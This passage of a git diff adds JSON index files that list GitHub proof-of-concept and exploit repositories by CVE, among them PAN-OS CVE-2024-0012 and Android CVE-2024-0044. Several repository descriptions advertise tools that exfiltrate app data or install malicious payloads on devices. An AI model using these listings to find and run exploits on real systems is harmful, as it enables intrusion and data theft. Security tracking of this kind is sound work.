"web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-7172.json b/2023/CVE-2023-7172.json new file mode 100644 index 0000000000..fd6290496c --- /dev/null +++ b/2023/CVE-2023-7172.json @@ -0,0 +1,33 @@ +[ + { + "id": 738005679, + "name": "CVE-2023-7172", + "full_name": "sharathc213\/CVE-2023-7172", + "owner": { + "login": "sharathc213", + "id": 63504490, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63504490?v=4", + "html_url": "https:\/\/github.com\/sharathc213", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sharathc213\/CVE-2023-7172", + "description": null, + "fork": false, + "created_at": "2024-01-02T07:28:25Z", + "updated_at": "2024-09-07T10:22:34Z", + "pushed_at": "2024-01-02T08:01:27Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-7173.json b/2023/CVE-2023-7173.json new file mode 100644 index 0000000000..3820055136 --- /dev/null +++ b/2023/CVE-2023-7173.json @@ -0,0 +1,33 @@ +[ + { + "id": 738027789, + "name": "CVE-2023-7173", + "full_name": "sharathc213\/CVE-2023-7173", + "owner": { + "login": "sharathc213", + "id": 63504490, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63504490?v=4", + "html_url": "https:\/\/github.com\/sharathc213", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sharathc213\/CVE-2023-7173", + "description": null, + "fork": false, + "created_at": "2024-01-02T08:41:10Z", + "updated_at": "2024-09-07T10:22:32Z", + "pushed_at": "2024-01-02T08:55:56Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-7261.json b/2023/CVE-2023-7261.json new file mode 100644 index 0000000000..e02220a1f1 --- /dev/null +++ b/2023/CVE-2023-7261.json @@ -0,0 +1,33 @@ +[ + { + "id": 888744283, + "name": "CVE-2023-7261", + "full_name": "zerozenxlabs\/CVE-2023-7261", + "owner": { + "login": "zerozenxlabs", + "id": 18348468, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18348468?v=4", + "html_url": "https:\/\/github.com\/zerozenxlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zerozenxlabs\/CVE-2023-7261", + "description": "Google Chrome Updater DosDevices Local Privilege Escalation Vulnerability", + "fork": false, + "created_at": "2024-11-14T23:41:32Z", + "updated_at": "2024-11-26T14:47:04Z", + "pushed_at": "2024-11-14T23:55:57Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0012.json b/2024/CVE-2024-0012.json new file mode 100644 index 0000000000..c41b963ca9 --- /dev/null +++ b/2024/CVE-2024-0012.json @@ -0,0 +1,219 @@ +[ + { + "id": 890817341, + "name": "palo-alto-panos-cve-2024-0012", + "full_name": "watchtowrlabs\/palo-alto-panos-cve-2024-0012", + "owner": { + "login": "watchtowrlabs", + "id": 99977116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99977116?v=4", + "html_url": "https:\/\/github.com\/watchtowrlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/watchtowrlabs\/palo-alto-panos-cve-2024-0012", + "description": null, + "fork": false, + "created_at": "2024-11-19T08:29:32Z", + "updated_at": "2024-11-25T06:15:42Z", + "pushed_at": "2024-11-19T09:28:42Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 20, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 890899855, + "name": "CVE-2024-0012-POC", + "full_name": "Sachinart\/CVE-2024-0012-POC", + "owner": { + "login": "Sachinart", + "id": 18497191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18497191?v=4", + "html_url": "https:\/\/github.com\/Sachinart", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sachinart\/CVE-2024-0012-POC", + "description": "CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015) RCE POC", + "fork": false, + "created_at": "2024-11-19T11:30:25Z", + "updated_at": "2024-11-26T02:13:08Z", + "pushed_at": "2024-11-19T11:37:09Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 891583314, + "name": "CVE-2024-0012", + "full_name": "greaselovely\/CVE-2024-0012", + "owner": { + "login": "greaselovely", + "id": 71092239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71092239?v=4", + "html_url": "https:\/\/github.com\/greaselovely", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/greaselovely\/CVE-2024-0012", + "description": "PANW NGFW CVE-2024-0012", + "fork": false, + "created_at": "2024-11-20T15:35:29Z", + "updated_at": "2024-11-22T20:10:24Z", + "pushed_at": "2024-11-22T20:10:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 891832016, + "name": "CVE-2024-0012", + "full_name": "VegetableLasagne\/CVE-2024-0012", + "owner": { + "login": "VegetableLasagne", + "id": 118773543, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118773543?v=4", + "html_url": "https:\/\/github.com\/VegetableLasagne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VegetableLasagne\/CVE-2024-0012", + "description": "Palo Alto CVE-2024-0012 Exploit POC", + "fork": false, + "created_at": "2024-11-21T03:08:00Z", + "updated_at": "2024-11-21T03:08:47Z", + "pushed_at": "2024-11-21T03:08:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892487345, + "name": "CVE-2024-0012-poc", + "full_name": "iSee857\/CVE-2024-0012-poc", + "owner": { + "login": "iSee857", + "id": 73977770, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73977770?v=4", + "html_url": "https:\/\/github.com\/iSee857", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iSee857\/CVE-2024-0012-poc", + "description": "CVE-2024-0012批量检测脚本", + "fork": false, + "created_at": "2024-11-22T07:52:11Z", + "updated_at": "2024-11-26T07:38:23Z", + "pushed_at": "2024-11-26T07:38:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892650578, + "name": "cve-2024-0012-poc", + "full_name": "XiaomingX\/cve-2024-0012-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-0012-poc", + "description": "CVE-2024-0012是Palo Alto Networks PAN-OS软件中的一个身份验证绕过漏洞。该漏洞允许未经身份验证的攻击者通过网络访问管理Web界面,获取PAN-OS管理员权限,从而执行管理操作、篡改配置,或利用其他需要身份验证的特权提升漏洞(如CVE-2024-9474) ", + "fork": false, + "created_at": "2024-11-22T14:11:56Z", + "updated_at": "2024-11-22T14:37:08Z", + "pushed_at": "2024-11-22T14:37:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892819901, + "name": "Paloalto-CVE-2024-0012", + "full_name": "PunitTailor55\/Paloalto-CVE-2024-0012", + "owner": { + "login": "PunitTailor55", + "id": 38101321, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38101321?v=4", + "html_url": "https:\/\/github.com\/PunitTailor55", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PunitTailor55\/Paloalto-CVE-2024-0012", + "description": null, + "fork": false, + "created_at": "2024-11-22T20:58:17Z", + "updated_at": "2024-11-22T21:00:08Z", + "pushed_at": "2024-11-22T21:00:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0015.json b/2024/CVE-2024-0015.json new file mode 100644 index 0000000000..ba80685dc5 --- /dev/null +++ b/2024/CVE-2024-0015.json @@ -0,0 +1,33 @@ +[ + { + "id": 774300309, + "name": "CVE-2024-0015", + "full_name": "UmVfX1BvaW50\/CVE-2024-0015", + "owner": { + "login": "UmVfX1BvaW50", + "id": 145543095, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145543095?v=4", + "html_url": "https:\/\/github.com\/UmVfX1BvaW50", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UmVfX1BvaW50\/CVE-2024-0015", + "description": "a demo poc for CVE-2024-0015", + "fork": false, + "created_at": "2024-03-19T10:00:21Z", + "updated_at": "2024-09-25T12:18:28Z", + "pushed_at": "2024-08-14T09:53:13Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0023.json b/2024/CVE-2024-0023.json new file mode 100644 index 0000000000..685e63f00c --- /dev/null +++ b/2024/CVE-2024-0023.json @@ -0,0 +1,64 @@ +[ + { + "id": 835151018, + "name": "G3_Frameworks_av_CVE-2024-0023", + "full_name": "AbrarKhan\/G3_Frameworks_av_CVE-2024-0023", + "owner": { + "login": "AbrarKhan", + "id": 3054615, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3054615?v=4", + "html_url": "https:\/\/github.com\/AbrarKhan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AbrarKhan\/G3_Frameworks_av_CVE-2024-0023", + "description": null, + "fork": false, + "created_at": "2024-07-29T09:06:34Z", + "updated_at": "2024-07-29T10:47:59Z", + "pushed_at": "2024-07-29T10:48:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 851627563, + "name": "frameworks_av_android10_r33_CVE-2024-0023", + "full_name": "Aakashmom\/frameworks_av_android10_r33_CVE-2024-0023", + "owner": { + "login": "Aakashmom", + "id": 76400693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76400693?v=4", + "html_url": "https:\/\/github.com\/Aakashmom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aakashmom\/frameworks_av_android10_r33_CVE-2024-0023", + "description": null, + "fork": false, + "created_at": "2024-09-03T12:47:32Z", + "updated_at": "2024-09-03T12:50:57Z", + "pushed_at": "2024-09-03T12:50:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0030.json b/2024/CVE-2024-0030.json new file mode 100644 index 0000000000..e1185bcbf1 --- /dev/null +++ b/2024/CVE-2024-0030.json @@ -0,0 +1,33 @@ +[ + { + "id": 840219760, + "name": "system_bt_CVE-2024-0030", + "full_name": "uthrasri\/system_bt_CVE-2024-0030", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/system_bt_CVE-2024-0030", + "description": null, + "fork": false, + "created_at": "2024-08-09T08:17:31Z", + "updated_at": "2024-08-09T08:54:42Z", + "pushed_at": "2024-08-09T08:18:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0039.json b/2024/CVE-2024-0039.json new file mode 100644 index 0000000000..f8a9a1f911 --- /dev/null +++ b/2024/CVE-2024-0039.json @@ -0,0 +1,43 @@ +[ + { + "id": 807845235, + "name": "CVE-2024-0039-Exploit", + "full_name": "41yn14\/CVE-2024-0039-Exploit", + "owner": { + "login": "41yn14", + "id": 55758408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55758408?v=4", + "html_url": "https:\/\/github.com\/41yn14", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/41yn14\/CVE-2024-0039-Exploit", + "description": "Эксплойт для уязвимости CVE-2024-0039 на Android, который позволяет выполнять произвольный код через MP4 файл. Этот репозиторий создан для образовательных целей.", + "fork": false, + "created_at": "2024-05-29T22:13:04Z", + "updated_at": "2024-11-20T16:30:48Z", + "pushed_at": "2024-05-29T22:17:39Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "android", + "cve", + "ethical-hacking", + "exploit", + "mp4", + "python", + "remote-code-execution", + "security", + "security-research" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0040.json b/2024/CVE-2024-0040.json new file mode 100644 index 0000000000..ae8819cfc5 --- /dev/null +++ b/2024/CVE-2024-0040.json @@ -0,0 +1,64 @@ +[ + { + "id": 835214655, + "name": "frameworks_av_AOSP10_r33_CVE-2024-0040", + "full_name": "nidhihcl75\/frameworks_av_AOSP10_r33_CVE-2024-0040", + "owner": { + "login": "nidhihcl75", + "id": 176363052, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176363052?v=4", + "html_url": "https:\/\/github.com\/nidhihcl75", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nidhihcl75\/frameworks_av_AOSP10_r33_CVE-2024-0040", + "description": null, + "fork": false, + "created_at": "2024-07-29T11:45:41Z", + "updated_at": "2024-07-29T11:48:59Z", + "pushed_at": "2024-07-29T11:48:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 838678998, + "name": "frameworks_av_CVE-2024-0040", + "full_name": "uthrasri\/frameworks_av_CVE-2024-0040", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/frameworks_av_CVE-2024-0040", + "description": null, + "fork": false, + "created_at": "2024-08-06T06:13:59Z", + "updated_at": "2024-08-08T06:18:28Z", + "pushed_at": "2024-08-08T06:18:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0044.json b/2024/CVE-2024-0044.json new file mode 100644 index 0000000000..d03b9ac446 --- /dev/null +++ b/2024/CVE-2024-0044.json @@ -0,0 +1,316 @@ +[ + { + "id": 816719987, + "name": "android_autorooter", + "full_name": "scs-labrat\/android_autorooter", + "owner": { + "login": "scs-labrat", + "id": 102700300, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102700300?v=4", + "html_url": "https:\/\/github.com\/scs-labrat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scs-labrat\/android_autorooter", + "description": "Exfiltrate sensitive user data from apps on Android 12 and 13 using CVE-2024-0044 vulnerability remotely", + "fork": false, + "created_at": "2024-06-18T09:22:59Z", + "updated_at": "2024-11-20T16:30:50Z", + "pushed_at": "2024-07-31T01:29:36Z", + "stargazers_count": 62, + "watchers_count": 62, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 62, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 816799428, + "name": "CVE-2024-0044", + "full_name": "pl4int3xt\/CVE-2024-0044", + "owner": { + "login": "pl4int3xt", + "id": 62325297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62325297?v=4", + "html_url": "https:\/\/github.com\/pl4int3xt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pl4int3xt\/CVE-2024-0044", + "description": "CVE-2024-0044: a \"run-as any app\" high-severity vulnerability affecting Android versions 12 and 13", + "fork": false, + "created_at": "2024-06-18T12:30:53Z", + "updated_at": "2024-11-23T03:06:02Z", + "pushed_at": "2024-07-25T18:12:57Z", + "stargazers_count": 256, + "watchers_count": 256, + "has_discussions": false, + "forks_count": 60, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 60, + "watchers": 256, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 823594837, + "name": "CVE-2024-0044-EXP", + "full_name": "Re13orn\/CVE-2024-0044-EXP", + "owner": { + "login": "Re13orn", + "id": 29865055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29865055?v=4", + "html_url": "https:\/\/github.com\/Re13orn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Re13orn\/CVE-2024-0044-EXP", + "description": "利用 CVE-2024-0044 Android 权限提升下载任意目标App沙箱文件。", + "fork": false, + "created_at": "2024-07-03T10:29:06Z", + "updated_at": "2024-11-13T03:17:51Z", + "pushed_at": "2024-09-03T09:31:58Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 827491098, + "name": "c-CVE-2024-0044", + "full_name": "007CRIPTOGRAFIA\/c-CVE-2024-0044", + "owner": { + "login": "007CRIPTOGRAFIA", + "id": 122584002, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122584002?v=4", + "html_url": "https:\/\/github.com\/007CRIPTOGRAFIA", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/007CRIPTOGRAFIA\/c-CVE-2024-0044", + "description": "CVE-2024-0044: uma vulnerabilidade de alta gravidade do tipo \"executar como qualquer aplicativo\" que afeta as versões 12 e 13 do Android", + "fork": false, + "created_at": "2024-07-11T18:46:45Z", + "updated_at": "2024-11-20T16:30:56Z", + "pushed_at": "2024-07-11T18:51:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 828846934, + "name": "CVE-2024-0044-EXP", + "full_name": "Kai2er\/CVE-2024-0044-EXP", + "owner": { + "login": "Kai2er", + "id": 40434718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40434718?v=4", + "html_url": "https:\/\/github.com\/Kai2er", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kai2er\/CVE-2024-0044-EXP", + "description": "利用CVE-2024-0044 在Android12、13 没有root'下进行数据备份 用法.\/CVE-2024-0044-EXP.sh ", + "fork": false, + "created_at": "2024-07-15T08:45:44Z", + "updated_at": "2024-07-15T13:20:04Z", + "pushed_at": "2024-07-15T09:00:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 836910059, + "name": "cve_2024_0044", + "full_name": "hunter24x24\/cve_2024_0044", + "owner": { + "login": "hunter24x24", + "id": 117602676, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117602676?v=4", + "html_url": "https:\/\/github.com\/hunter24x24", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hunter24x24\/cve_2024_0044", + "description": "CVE-2024-0044: a \"run-as any app\" high-severity vulnerability affecting Android versions 12 and 13", + "fork": false, + "created_at": "2024-08-01T20:14:22Z", + "updated_at": "2024-08-09T00:09:24Z", + "pushed_at": "2024-08-01T20:18:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 837927961, + "name": "EvilDroid", + "full_name": "nexussecelite\/EvilDroid", + "owner": { + "login": "nexussecelite", + "id": 92028299, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92028299?v=4", + "html_url": "https:\/\/github.com\/nexussecelite", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nexussecelite\/EvilDroid", + "description": "EvilDroid automates the exploitation of CVE-2024-0044, installing malicious payloads on a target device and extracting sensitive data. It features automated ADB connection checks, APK pushing, UID extraction, payload generation, and real-time progress updates, providing a seamless and professional user experience.", + "fork": false, + "created_at": "2024-08-04T13:14:10Z", + "updated_at": "2024-11-20T16:30:59Z", + "pushed_at": "2024-08-05T14:13:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 842052431, + "name": "CVE-2024-0044", + "full_name": "nahid0x1\/CVE-2024-0044", + "owner": { + "login": "nahid0x1", + "id": 76641588, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76641588?v=4", + "html_url": "https:\/\/github.com\/nahid0x1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nahid0x1\/CVE-2024-0044", + "description": "a vulnerability affecting Android version 12 & 13", + "fork": false, + "created_at": "2024-08-13T15:15:47Z", + "updated_at": "2024-09-10T08:27:59Z", + "pushed_at": "2024-08-13T15:20:44Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844326639, + "name": "cve-2024-0044", + "full_name": "MrW0l05zyn\/cve-2024-0044", + "owner": { + "login": "MrW0l05zyn", + "id": 344519, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/344519?v=4", + "html_url": "https:\/\/github.com\/MrW0l05zyn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrW0l05zyn\/cve-2024-0044", + "description": "CVE-2024-0044", + "fork": false, + "created_at": "2024-08-19T02:51:14Z", + "updated_at": "2024-11-12T16:04:10Z", + "pushed_at": "2024-08-24T06:32:58Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "android", + "cve-2024-0044", + "mobile-security" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 863974760, + "name": "CVE-2024-0044", + "full_name": "canyie\/CVE-2024-0044", + "owner": { + "login": "canyie", + "id": 31466456, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31466456?v=4", + "html_url": "https:\/\/github.com\/canyie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/canyie\/CVE-2024-0044", + "description": "PoC and writeup for bypassing the initial patch of CVE-2024-0044, Android run-as any app vulnerability allowing privilege escalation from adb to installed app", + "fork": false, + "created_at": "2024-09-27T09:02:08Z", + "updated_at": "2024-11-25T16:17:22Z", + "pushed_at": "2024-09-30T12:48:08Z", + "stargazers_count": 118, + "watchers_count": 118, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 118, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0049.json b/2024/CVE-2024-0049.json new file mode 100644 index 0000000000..ab12d9810d --- /dev/null +++ b/2024/CVE-2024-0049.json @@ -0,0 +1,64 @@ +[ + { + "id": 835201651, + "name": "frameworks_av_AOSP10_r33_CVE-2024-0049", + "full_name": "nidhihcl75\/frameworks_av_AOSP10_r33_CVE-2024-0049", + "owner": { + "login": "nidhihcl75", + "id": 176363052, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176363052?v=4", + "html_url": "https:\/\/github.com\/nidhihcl75", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nidhihcl75\/frameworks_av_AOSP10_r33_CVE-2024-0049", + "description": null, + "fork": false, + "created_at": "2024-07-29T11:12:32Z", + "updated_at": "2024-07-29T11:15:32Z", + "pushed_at": "2024-07-29T11:15:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 851611620, + "name": "frameworks_av_android10_r33_CVE-2024-0049", + "full_name": "Aakashmom\/frameworks_av_android10_r33_CVE-2024-0049", + "owner": { + "login": "Aakashmom", + "id": 76400693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76400693?v=4", + "html_url": "https:\/\/github.com\/Aakashmom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aakashmom\/frameworks_av_android10_r33_CVE-2024-0049", + "description": null, + "fork": false, + "created_at": "2024-09-03T12:15:01Z", + "updated_at": "2024-09-03T12:32:35Z", + "pushed_at": "2024-09-03T12:32:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0195.json b/2024/CVE-2024-0195.json new file mode 100644 index 0000000000..d184c970a7 --- /dev/null +++ b/2024/CVE-2024-0195.json @@ -0,0 +1,133 @@ +[ + { + "id": 813399149, + "name": "CVE-2024-0195", + "full_name": "Cappricio-Securities\/CVE-2024-0195", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-0195", + "description": "SpiderFlow Crawler Platform - Remote Code Execution", + "fork": false, + "created_at": "2024-06-11T02:34:34Z", + "updated_at": "2024-09-01T18:48:10Z", + "pushed_at": "2024-06-24T10:55:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-0195", + "pentesting", + "rce", + "spiderflow", + "wapt" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 850225780, + "name": "CVE-2024-0195-SpiderFlow", + 